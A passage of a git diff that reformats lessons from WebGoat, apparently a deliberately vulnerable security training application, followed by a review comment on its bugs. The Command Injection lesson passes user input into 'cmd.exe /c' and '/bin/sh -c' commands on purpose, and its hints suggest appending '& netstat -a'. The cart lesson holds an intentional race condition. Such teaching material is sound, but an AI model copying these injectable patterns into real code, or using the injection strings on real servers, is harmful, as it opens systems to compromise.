"<select file from list below>" : helpFile.toString()) + + "")); - if (!illegalCommand) - { - String results; - String fileData = null; - helpFile = helpFile.replaceAll("\\.help", "\\.html"); + if (!illegalCommand) + { + String results; + String fileData = null; + helpFile = helpFile.replaceAll("\\.help", "\\.html"); - if (osName.indexOf("Windows") != -1) + if (osName.indexOf("Windows") != -1) + { + // Add quotes around the filename to avoid having special characters in DOS + // filenames + results = exec(s, "cmd.exe /c dir /b \"" + safeDir.getPath() + "\""); + fileData = exec(s, "cmd.exe /c type \"" + new File(safeDir, helpFile).getPath() + "\""); + + } + else + { + String[] cmd1 = { "/bin/sh", "-c", "ls \"" + safeDir.getPath() + "\"" }; + results = exec(s, cmd1); + String[] cmd2 = { "/bin/sh", "-c", "cat \"" + new File(safeDir, helpFile).getPath() + "\"" }; + fileData = exec(s, cmd2); + } + + ec.addElement(new P().addElement("Select the lesson plan to view: ")); + ec.addElement(ECSFactory.makePulldown(HELP_FILE, parseResults(results.replaceAll("(?s)\\.html", + "\\.help")))); + // ec.addElement( results ); + Element b = ECSFactory.makeButton("View"); + ec.addElement(b); + // Strip out some of the extra html from the "help" file + ec.addElement(new BR()); + ec.addElement(new BR()); + ec.addElement(new HR().setWidth("90%")); + ec.addElement(new StringElement(fileData.replaceAll(System.getProperty("line.separator"), "
") + .replaceAll("(?s)", "").replaceAll("

", "
") + .replaceAll("
\\s
", "
"))); + + } + } catch (Exception e) { - // Add quotes around the filename to avoid having special characters in DOS filenames - results = exec(s, "cmd.exe /c dir /b \"" - + safeDir.getPath() + "\""); - fileData = exec(s, "cmd.exe /c type \"" - + new File(safeDir, helpFile).getPath() + "\""); - - } - else - { - String[] cmd1 = { "/bin/sh", "-c", - "ls \"" + safeDir.getPath() + "\"" }; - results = exec(s, cmd1); - String[] cmd2 = { - "/bin/sh", - "-c", - "cat \"" + new File(safeDir, helpFile).getPath() - + "\"" }; - fileData = exec(s, cmd2); + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); } - ec.addElement(new P() - .addElement("Select the lesson plan to view: ")); - ec.addElement(ECSFactory.makePulldown(HELP_FILE, - parseResults(results.replaceAll("(?s)\\.html", - "\\.help")))); - //ec.addElement( results ); - Element b = ECSFactory.makeButton("View"); - ec.addElement(b); - // Strip out some of the extra html from the "help" file - ec.addElement(new BR()); - ec.addElement(new BR()); - ec.addElement(new HR().setWidth("90%")); - ec.addElement(new StringElement(fileData.replaceAll( - System.getProperty("line.separator"), "
") - .replaceAll("(?s)", "").replaceAll( - "

", "
").replaceAll("
\\s
", - "
"))); - - } - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + return (ec); } - return (ec); - } - - - private String parseResults(String results) - { - results.replaceAll("(?s).*Output...\\s", "").replaceAll("(?s)Returncode.*", ""); - StringTokenizer st = new StringTokenizer(results, "\n"); - StringBuffer modified = new StringBuffer(); - - while(st.hasMoreTokens()) - { - String s = (String)st.nextToken().trim(); - - if(s.length() > 0 && s.endsWith(".help")) - { - modified.append(s + "\n"); - } - } - - return modified.toString(); - } - - - public static int upDirCount(String fileName) - { - int count = 0; - // check for "." = %2d - // we wouldn't want anyone bypassing the check by useing encoding :) - // FIXME: I don't think hex endoing will work here. - fileName = fileName.replaceAll("%2d", "."); - int startIndex = fileName.indexOf(".."); - while (startIndex != -1) + private String parseResults(String results) { - count++; - startIndex = fileName.indexOf("..", startIndex + 1); - } - return count; - } + results.replaceAll("(?s).*Output...\\s", "").replaceAll("(?s)Returncode.*", ""); + StringTokenizer st = new StringTokenizer(results, "\n"); + StringBuffer modified = new StringBuffer(); + while (st.hasMoreTokens()) + { + String s = (String) st.nextToken().trim(); - /** - * Description of the Method - * - * @param command Description of the Parameter - * @param s Description of the Parameter - * @return Description of the Return Value - */ - private String exec(WebSession s, String command) - { - System.out.println("Executing OS command: " + command); - ExecResults er = Exec.execSimple(command); - if ((command.indexOf("&") != -1 || command.indexOf(";") != -1) - && !er.getError()) - { - makeSuccess(s); + if (s.length() > 0 && s.endsWith(".help")) + { + modified.append(s + "\n"); + } + } + + return modified.toString(); } - return (er.toString()); - } - - - /** - * Description of the Method - * - * 
@param command Description of the Parameter - * @param s Description of the Parameter - * @return Description of the Return Value - */ - private String exec(WebSession s, String[] command) - { - System.out.println("Executing OS command: " + Arrays.asList(command)); - ExecResults er = Exec.execSimple(command); - if (!er.getError()) + public static int upDirCount(String fileName) { - makeSuccess(s); + int count = 0; + // check for "." = %2d + // we wouldn't want anyone bypassing the check by useing encoding :) + // FIXME: I don't think hex endoing will work here. + fileName = fileName.replaceAll("%2d", "."); + int startIndex = fileName.indexOf(".."); + while (startIndex != -1) + { + count++; + startIndex = fileName.indexOf("..", startIndex + 1); + } + return count; } - return (er.toString()); - } + /** + * Description of the Method + * + * @param command + * Description of the Parameter + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + private String exec(WebSession s, String command) + { + System.out.println("Executing OS command: " + command); + ExecResults er = Exec.execSimple(command); + if ((command.indexOf("&") != -1 || command.indexOf(";") != -1) && !er.getError()) + { + makeSuccess(s); + } - /** - * Gets the category attribute of the CommandInjection object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.INJECTION; - } + return (er.toString()); + } + /** + * Description of the Method + * + * @param command + * Description of the Parameter + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + private String exec(WebSession s, String[] command) + { + System.out.println("Executing OS command: " + Arrays.asList(command)); + ExecResults er = Exec.execSimple(command); + if (!er.getError()) + { + makeSuccess(s); + } - /** - * Gets the hints attribute of the DirectoryScreen object - * - * @return The hints value - */ - 
protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints - .add("The application is using a system command to return the contents of a file."); - hints - .add("The ampersand(&) separates commands in the Windows 2000 command shell. In Unix the separator is typically a semi-colon(;)"); - hints - .add("Use a proxy to insert & netstat -a on Windows or ;netstat -a on Unix."); - hints - .add("Note that the server may enclose the submitted file name within quotes"); + return (er.toString()); + } - return hints; - } + /** + * Gets the category attribute of the CommandInjection object + * + * @return The category value + */ + protected Category getDefaultCategory() + { + return Category.INJECTION; + } + /** + * Gets the hints attribute of the DirectoryScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + hints.add("The application is using a system command to return the contents of a file."); + hints + .add("The ampersand(&) separates commands in the Windows 2000 command shell. In Unix the separator is typically a semi-colon(;)"); + hints.add("Use a proxy to insert & netstat -a on Windows or ;netstat -a on Unix."); + hints.add("Note that the server may enclose the submitted file name within quotes"); - /** - * Gets the instructions attribute of the ParameterInjection object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - String instructions = "Choose the lesson plan you would like to view. " - + "Try to inject a command to the operating system."; + return hints; + } - return (instructions); - } + /** + * Gets the instructions attribute of the ParameterInjection object + * + * @return The instructions value + */ + public String getInstructions(WebSession s) + { + String instructions = "Choose the lesson plan you would like to view. 
" + + "Try to inject a command to the operating system."; - private final static Integer DEFAULT_RANKING = new Integer(40); + return (instructions); + } + private final static Integer DEFAULT_RANKING = new Integer(40); - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - - /** - * Gets the title attribute of the DirectoryScreen object - * - * @return The title value - */ - public String getTitle() - { - return "Command Injection"; - } + /** + * Gets the title attribute of the DirectoryScreen object + * + * @return The title value + */ + public String getTitle() + { + return "Command Injection"; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java index 8184975f9..119741496 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons; import java.text.NumberFormat; @@ -5,7 +6,6 @@ import java.util.ArrayList; import java.util.List; import java.util.Locale; import java.util.regex.Pattern; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.html.A; 
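Review bot: In `parseResults`, the new side still discards the result of `results.replaceAll("(?s).*Output...\\s", "").replaceAll("(?s)Returncode.*", "")` — `String` is immutable, so the `StringTokenizer` on the next line tokenizes the unstripped text; it should read `results = results.replaceAll("(?s).*Output...\\s", "").replaceAll("(?s)Returncode.*", "");`. In `upDirCount`, the comment says `"." = %2d`, but `%2d` is the encoding of `-`, so the substitution does not implement the check the comment describes (the existing FIXME already doubts it); decoding the value once with `URLDecoder.decode(fileName, "UTF-8")` before counting `..` is the robust form. In `createContent`, `helpFile.substring(index, helpFileLen)` throws `StringIndexOutOfBoundsException` when the separator is the last character of the parameter (`index == helpFile.length()` while `helpFileLen == helpFile.length() - 1`), which the outer `catch (Exception e)` then reports only as the generic "Error generating" message; a guard such as `if (index < helpFileLen)` around that branch keeps the error specific. Both `exec` overloads also write the raw user-supplied command line to `System.out`; the project's logger is the better sink for that.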
@@ -24,587 +24,603 @@ import org.owasp.webgoat.session.ParameterNotFoundException; import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.util.HtmlEncoder; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Ryan Knell Aspect Security - * @created July, 23 2007 + * + * @author Ryan Knell Aspect Security + * @created July, 23 2007 */ public class ConcurrencyCart extends LessonAdapter { - //Shared Variables + // Shared Variables private static int total = 0; - private static float runningTOTAL = 0; - private static int subTOTAL = 0; - private static float calcTOTAL = 0; - private static int quantity1 = 0; - private static int quantity2 = 0; - private static int quantity3 = 0; - private static int quantity4 = 0; - private float ratio = 0; - private int discount = 0; - - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - + private static float runningTOTAL = 0; + private static int subTOTAL = 0; + private static float calcTOTAL = 0; + private static int quantity1 = 0; + private static int quantity2 = 0; + private static int quantity3 = 0; + private static int quantity4 = 0; + private float ratio = 0; + private int discount = 0; + + public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") + .addElement( + new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) + .setVspace(0)); + + /** + * Description 
of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) - { - ElementContainer ec = null; - - try - { - String submit = s.getParser().getStringParameter("SUBMIT"); - - if("Purchase".equalsIgnoreCase(submit)) - { - updateQuantity(s); - ec = createPurchaseContent(s, quantity1, quantity2, quantity3, quantity4); - } - else if ("Confirm".equalsIgnoreCase(submit)) - { - ec = confirmation(s, quantity1, quantity2, quantity3, quantity4); - - //Discount - - if (calcTOTAL == 0) // No total cost for items - { - discount = 0; // Discount meaningless - } - else // The expected case -- items cost something - { - ratio = runningTOTAL / calcTOTAL; - } - - - if (calcTOTAL > runningTOTAL) - { - //CONGRATS - discount = (int) (100 * (1 - ratio)); - s.setMessage("Thank you for shopping! You have (illegally!) received a " + discount +"% discount. Police are on the way to your IP address."); - - makeSuccess(s); - } - else if (calcTOTAL < runningTOTAL) - { - //ALMOST - discount = (int) (100 * (ratio - 1)); - s.setMessage("You are on the right track, but you actually overpaid by " + discount + "%. 
Try again!"); - } - } - else - { - updateQuantity(s); - ec = createShoppingPage(s, quantity1, quantity2, quantity3, quantity4); - } - - } - catch (ParameterNotFoundException pnfe) - { - System.out.println("[DEBUG] no action selected, defaulting to createShoppingPage"); - ec = createShoppingPage(s, quantity1, quantity2, quantity3, quantity4); - } - - return ec; - } - - //UPDATE QUANTITY VARIABLES + { + ElementContainer ec = null; + + try + { + String submit = s.getParser().getStringParameter("SUBMIT"); + + if ("Purchase".equalsIgnoreCase(submit)) + { + updateQuantity(s); + ec = createPurchaseContent(s, quantity1, quantity2, quantity3, quantity4); + } + else if ("Confirm".equalsIgnoreCase(submit)) + { + ec = confirmation(s, quantity1, quantity2, quantity3, quantity4); + + // Discount + + if (calcTOTAL == 0) // No total cost for items + { + discount = 0; // Discount meaningless + } + else + // The expected case -- items cost something + { + ratio = runningTOTAL / calcTOTAL; + } + + if (calcTOTAL > runningTOTAL) + { + // CONGRATS + discount = (int) (100 * (1 - ratio)); + s.setMessage("Thank you for shopping! You have (illegally!) received a " + discount + + "% discount. Police are on the way to your IP address."); + + makeSuccess(s); + } + else if (calcTOTAL < runningTOTAL) + { + // ALMOST + discount = (int) (100 * (ratio - 1)); + s.setMessage("You are on the right track, but you actually overpaid by " + discount + + "%. 
Try again!"); + } + } + else + { + updateQuantity(s); + ec = createShoppingPage(s, quantity1, quantity2, quantity3, quantity4); + } + + } catch (ParameterNotFoundException pnfe) + { + System.out.println("[DEBUG] no action selected, defaulting to createShoppingPage"); + ec = createShoppingPage(s, quantity1, quantity2, quantity3, quantity4); + } + + return ec; + } + + // UPDATE QUANTITY VARIABLES private void updateQuantity(WebSession s) { - quantity1 = thinkPositive(s.getParser().getIntParameter("QTY1", 0)); - quantity2 = thinkPositive(s.getParser().getIntParameter("QTY2", 0)); - quantity3 = thinkPositive(s.getParser().getIntParameter("QTY3", 0)); - quantity4 = thinkPositive(s.getParser().getIntParameter("QTY4", 0)); + quantity1 = thinkPositive(s.getParser().getIntParameter("QTY1", 0)); + quantity2 = thinkPositive(s.getParser().getIntParameter("QTY2", 0)); + quantity3 = thinkPositive(s.getParser().getIntParameter("QTY3", 0)); + quantity4 = thinkPositive(s.getParser().getIntParameter("QTY4", 0)); } - - /* - ********************************************************************** - ******************* PURCHASING PAGE ********************************** - ********************************************************************** - */ - - private ElementContainer createPurchaseContent(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4) - { - - ElementContainer ec = new ElementContainer(); - runningTOTAL = 0; - - String regex1 = "^[0-9]{3}$";// any three digits - Pattern pattern1 = Pattern.compile(regex1); - - try + + /* + * ********************************************************************* ****************** + * PURCHASING PAGE ********************************** + * ********************************************************************* + */ + + private ElementContainer createPurchaseContent(WebSession s, int quantity1, int quantity2, int quantity3, + int quantity4) { - String param1 = s.getParser().getRawParameter("PAC", "111"); - String param2 = 
HtmlEncoder.encode(s.getParser().getRawParameter( - "CC", "5321 1337 8888 2007")); - - // test input field1 - if (!pattern1.matcher(param1).matches()) - { - s.setMessage("Error! You entered " + HtmlEncoder.encode(param1) + " instead of your 3 digit code. Please try again."); - } - - ec.addElement(new HR().setWidth("90%")); - ec.addElement(new Center().addElement(new H1().addElement("Place your order "))); - Table table = new Table().setCellSpacing(0).setCellPadding(2) - .setBorder(1).setWidth("90%").setAlign("center"); - if (s.isColor()) - { table.setBorder(1); } - - //Table Setup - TR tr = new TR(); - tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%")); - tr.addElement(new TH().addElement("Price").setWidth("10%")); - tr.addElement(new TH().addElement("Quantity").setWidth("3%")); - tr.addElement(new TH().addElement("Subtotal").setWidth("7%")); - table.addElement(tr); - - //Item 1 - tr = new TR(); //Create a new table object - tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive")); - tr.addElement(new TD().addElement("$169.00").setAlign("right")); - tr.addElement(new TD().addElement(String.valueOf(quantity1)).setAlign("center")); - - total = quantity1 * 169; - runningTOTAL += total; - tr.addElement(new TD().addElement("$" + formatInt(total) +".00")); - table.addElement(tr); //Adds table to the HTML - - //Item 2 - tr = new TR(); - tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer")); - tr.addElement(new TD().addElement("$299.00").setAlign("right")); - tr.addElement(new TD().addElement(String.valueOf(quantity2)).setAlign("center")); - - total = quantity2 * 299; - runningTOTAL += total; - tr.addElement(new TD().addElement("$" + formatInt(total) +".00")); - table.addElement(tr); - - //Item 3 - tr = new TR(); - tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino")); - tr.addElement(new TD().addElement("$1799.00").setAlign("right")); - tr.addElement(new 
TD().addElement(String.valueOf(quantity3)).setAlign("center")); - - total = quantity3 * 1799; - runningTOTAL += total; - tr.addElement(new TD().addElement("$" + formatInt(total) +".00")); - table.addElement(tr); - - //Item 4 - tr = new TR(); - tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector ")); - tr.addElement(new TD().addElement("$649.00").setAlign("right")); - tr.addElement(new TD().addElement(String.valueOf(quantity4)).setAlign("center")); - - total = quantity4 * 649; - runningTOTAL += total; - tr.addElement(new TD().addElement("$" + formatInt(total) +".00")); - table.addElement(tr); + ElementContainer ec = new ElementContainer(); + runningTOTAL = 0; - ec.addElement(table); + String regex1 = "^[0-9]{3}$";// any three digits + Pattern pattern1 = Pattern.compile(regex1); - table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0) - .setWidth("90%").setAlign("center"); - - if (s.isColor()) { table.setBorder(1); } - - ec.addElement(new BR()); - - calcTOTAL = runningTOTAL; - - //Total Charged - tr = new TR(); - tr.addElement(new TD().addElement("Total:")); - tr.addElement(new TD().addElement("$" + formatFloat(runningTOTAL)).setAlign("right")); - table.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().addElement(" ").setColSpan(2)); - table.addElement(tr); - - //Credit Card Input - tr = new TR(); - tr.addElement(new TD().addElement("Enter your credit card number:")); - tr.addElement(new TD().addElement(new Input(Input.TEXT, "CC", param2)).setAlign("right")); - table.addElement(tr); - - //PAC Input - tr = new TR(); - tr.addElement(new TD().addElement("Enter your three digit access code:")); - tr.addElement(new TD().addElement(new Input(Input.TEXT, "PAC", param1)).setAlign("right")); - table.addElement(tr); - - //Confirm Button - Element b = ECSFactory.makeButton("Confirm"); - tr = new TR(); - tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right")); - table.addElement(tr); - - //Cancel Button - Element c = 
ECSFactory.makeButton("Cancel"); - tr = new TR(); - tr.addElement(new TD().addElement(c).setColSpan(2).setAlign("right")); - table.addElement(tr); - - ec.addElement(table); - ec.addElement(new BR()); - - } - catch (Exception e) + try { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); - } - - return (ec); - } - - /* - ********************************************************************** - ******************* CONFIRMATION PAGE ******************************** - ********************************************************************** - */ - - private ElementContainer confirmation (WebSession s, int quantity1, int quantity2, int quantity3, int quantity4) - { - ElementContainer ec = new ElementContainer(); - - final String confNumber = "CONC-88"; - calcTOTAL = 0; - try - { - //Thread.sleep(5000); - - ec.addElement(new HR().setWidth("90%")); - ec.addElement(new Center().addElement(new H1().addElement("Thank you for your purchase!"))); - ec.addElement(new Center().addElement(new H1().addElement("Confirmation number: " + confNumber))); - Table table = new Table().setCellSpacing(0).setCellPadding(2) - .setBorder(1).setWidth("90%").setAlign("center"); + String param1 = s.getParser().getRawParameter("PAC", "111"); + String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("CC", "5321 1337 8888 2007")); - if (s.isColor()) - { table.setBorder(1); } - - //Table Setup - TR tr = new TR(); - tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%")); - tr.addElement(new TH().addElement("Price").setWidth("10%")); - tr.addElement(new TH().addElement("Quantity").setWidth("3%")); - tr.addElement(new TH().addElement("Subtotal").setWidth("7%")); - table.addElement(tr); - - //Item 1 - tr = new TR(); //Create a new table object - tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive")); - tr.addElement(new TD().addElement("$169.00").setAlign("right")); - tr.addElement(new 
TD().addElement(String.valueOf(quantity1)).setAlign("center")); - - total = quantity1 * 169; - calcTOTAL += total; - tr.addElement(new TD().addElement("$" + formatInt(total) +".00")); - table.addElement(tr); //Adds table to the HTML - - //Item 2 - tr = new TR(); - tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer")); - tr.addElement(new TD().addElement("$299.00").setAlign("right")); - tr.addElement(new TD().addElement(String.valueOf(quantity2)).setAlign("center")); - - total = quantity2 * 299; - calcTOTAL += total; - tr.addElement(new TD().addElement("$" + formatInt(total) +".00")); - table.addElement(tr); - - //Item 3 - tr = new TR(); - tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino")); - tr.addElement(new TD().addElement("$1799.00").setAlign("right")); - tr.addElement(new TD().addElement(String.valueOf(quantity3)).setAlign("center")); - - total = quantity3 * 1799; - calcTOTAL += total; - tr.addElement(new TD().addElement("$" + formatInt(total) +".00")); - table.addElement(tr); - - //Item 4 - tr = new TR(); - tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector ")); - tr.addElement(new TD().addElement("$649.00").setAlign("right")); - tr.addElement(new TD().addElement(String.valueOf(quantity4)).setAlign("center")); - - total = quantity4 * 649; - calcTOTAL += total; - tr.addElement(new TD().addElement("$" + formatInt(total) +".00")); - table.addElement(tr); - - ec.addElement(table); - - table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0) - .setWidth("90%").setAlign("center"); - - if (s.isColor()) - { table.setBorder(1); } - - ec.addElement(new BR()); - - //Total Charged - tr = new TR(); - tr.addElement(new TD().addElement("Total Amount Charged to Your Credit Card:")); - tr.addElement(new TD().addElement("$" + formatFloat(runningTOTAL)).setAlign("right")); - table.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().addElement(" ").setColSpan(2)); - table.addElement(tr); - - //Return to 
Store Button - Element b = ECSFactory.makeButton("Return to Store"); - tr = new TR(); - tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("center")); - table.addElement(tr); - - ec.addElement(table); - ec.addElement(new BR()); - - } - catch (Exception e) + // test input field1 + if (!pattern1.matcher(param1).matches()) { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + s.setMessage("Error! You entered " + HtmlEncoder.encode(param1) + + " instead of your 3 digit code. Please try again."); } - return (ec); - } - - /* - ********************************************************************** - ******************* SHOPPING PAGE ********************************** - ********************************************************************** - */ - - private ElementContainer createShoppingPage(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4) - { - - ElementContainer ec = new ElementContainer(); - subTOTAL = 0; - try - { - - ec.addElement(new HR().setWidth("90%")); - ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart "))); - Table table = new Table().setCellSpacing(0).setCellPadding(2) - .setBorder(1).setWidth("90%").setAlign("center"); + ec.addElement(new HR().setWidth("90%")); + ec.addElement(new Center().addElement(new H1().addElement("Place your order "))); + Table table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%") + .setAlign("center"); - if (s.isColor()) - { table.setBorder(1); } - - //Table Setup - TR tr = new TR(); - tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%")); - tr.addElement(new TH().addElement("Price").setWidth("10%")); - tr.addElement(new TH().addElement("Quantity").setWidth("3%")); - tr.addElement(new TH().addElement("Subtotal").setWidth("7%")); - table.addElement(tr); - - //Item 1 - tr = new TR(); //Create a new table object - tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive")); - 
tr.addElement(new TD().addElement("$169.00").setAlign("right")); - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "QTY1", String.valueOf(quantity1))) - .setAlign("right")); - - total = quantity1 * 169; - subTOTAL += total; - tr.addElement(new TD().addElement("$" + formatInt(total) +".00")); - table.addElement(tr); //Adds table to the HTML - - //Item 2 - tr = new TR(); - tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer")); - tr.addElement(new TD().addElement("$299.00").setAlign("right")); - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "QTY2", String.valueOf(quantity2))) - .setAlign("right")); - - total = quantity2 * 299; - subTOTAL += total; - tr.addElement(new TD().addElement("$" + formatInt(total) +".00")); - table.addElement(tr); - - //Item 3 - tr = new TR(); - tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino")); - tr.addElement(new TD().addElement("$1799.00").setAlign("right")); - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "QTY3", String.valueOf(quantity3))) - .setAlign("right")); - - total = quantity3 * 1799; - subTOTAL += total; - tr.addElement(new TD().addElement("$" + formatInt(total) +".00")); - table.addElement(tr); - - //Item 4 - tr = new TR(); - tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector ")); - tr.addElement(new TD().addElement("$649.00").setAlign("right")); - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "QTY4", String.valueOf(quantity4))) - .setAlign("right")); - - total = quantity4 * 649; - subTOTAL += total; - tr.addElement(new TD().addElement("$" + formatInt(total) +".00")); - table.addElement(tr); + if (s.isColor()) + { + table.setBorder(1); + } - ec.addElement(table); + // Table Setup + TR tr = new TR(); + tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%")); + tr.addElement(new TH().addElement("Price").setWidth("10%")); + tr.addElement(new TH().addElement("Quantity").setWidth("3%")); + tr.addElement(new 
TH().addElement("Subtotal").setWidth("7%")); + table.addElement(tr); - table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0) - .setWidth("90%").setAlign("center"); + // Item 1 + tr = new TR(); // Create a new table object + tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive")); + tr.addElement(new TD().addElement("$169.00").setAlign("right")); + tr.addElement(new TD().addElement(String.valueOf(quantity1)).setAlign("center")); - if (s.isColor()) - { table.setBorder(1); } + total = quantity1 * 169; + runningTOTAL += total; + tr.addElement(new TD().addElement("$" + formatInt(total) + ".00")); + table.addElement(tr); // Adds table to the HTML - ec.addElement(new BR()); - - //Purchasing Amount - tr = new TR(); - tr.addElement(new TD().addElement("Total: " +"$" +formatInt(subTOTAL) +".00").setAlign("left")); - table.addElement(tr); + // Item 2 + tr = new TR(); + tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer")); + tr.addElement(new TD().addElement("$299.00").setAlign("right")); + tr.addElement(new TD().addElement(String.valueOf(quantity2)).setAlign("center")); - //Update Button - Element b = ECSFactory.makeButton("Update Cart"); - tr = new TR(); - tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right")); - table.addElement(tr); + total = quantity2 * 299; + runningTOTAL += total; + tr.addElement(new TD().addElement("$" + formatInt(total) + ".00")); + table.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().addElement(" ").setColSpan(2)); - table.addElement(tr); - - //Purchase Button - Element c = ECSFactory.makeButton("Purchase"); - tr = new TR(); - tr.addElement(new TD().addElement(c).setColSpan(2).setAlign("right")); - table.addElement(tr); + // Item 3 + tr = new TR(); + tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino")); + tr.addElement(new TD().addElement("$1799.00").setAlign("right")); + tr.addElement(new 
TD().addElement(String.valueOf(quantity3)).setAlign("center")); - ec.addElement(table); - ec.addElement(new BR()); - + total = quantity3 * 1799; + runningTOTAL += total; + tr.addElement(new TD().addElement("$" + formatInt(total) + ".00")); + table.addElement(tr); + + // Item 4 + tr = new TR(); + tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector ")); + tr.addElement(new TD().addElement("$649.00").setAlign("right")); + tr.addElement(new TD().addElement(String.valueOf(quantity4)).setAlign("center")); + + total = quantity4 * 649; + runningTOTAL += total; + tr.addElement(new TD().addElement("$" + formatInt(total) + ".00")); + table.addElement(tr); + + ec.addElement(table); + + table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); + + if (s.isColor()) + { + table.setBorder(1); + } + + ec.addElement(new BR()); + + calcTOTAL = runningTOTAL; + + // Total Charged + tr = new TR(); + tr.addElement(new TD().addElement("Total:")); + tr.addElement(new TD().addElement("$" + formatFloat(runningTOTAL)).setAlign("right")); + table.addElement(tr); + + tr = new TR(); + tr.addElement(new TD().addElement(" ").setColSpan(2)); + table.addElement(tr); + + // Credit Card Input + tr = new TR(); + tr.addElement(new TD().addElement("Enter your credit card number:")); + tr.addElement(new TD().addElement(new Input(Input.TEXT, "CC", param2)).setAlign("right")); + table.addElement(tr); + + // PAC Input + tr = new TR(); + tr.addElement(new TD().addElement("Enter your three digit access code:")); + tr.addElement(new TD().addElement(new Input(Input.TEXT, "PAC", param1)).setAlign("right")); + table.addElement(tr); + + // Confirm Button + Element b = ECSFactory.makeButton("Confirm"); + tr = new TR(); + tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right")); + table.addElement(tr); + + // Cancel Button + Element c = ECSFactory.makeButton("Cancel"); + tr = new TR(); + tr.addElement(new 
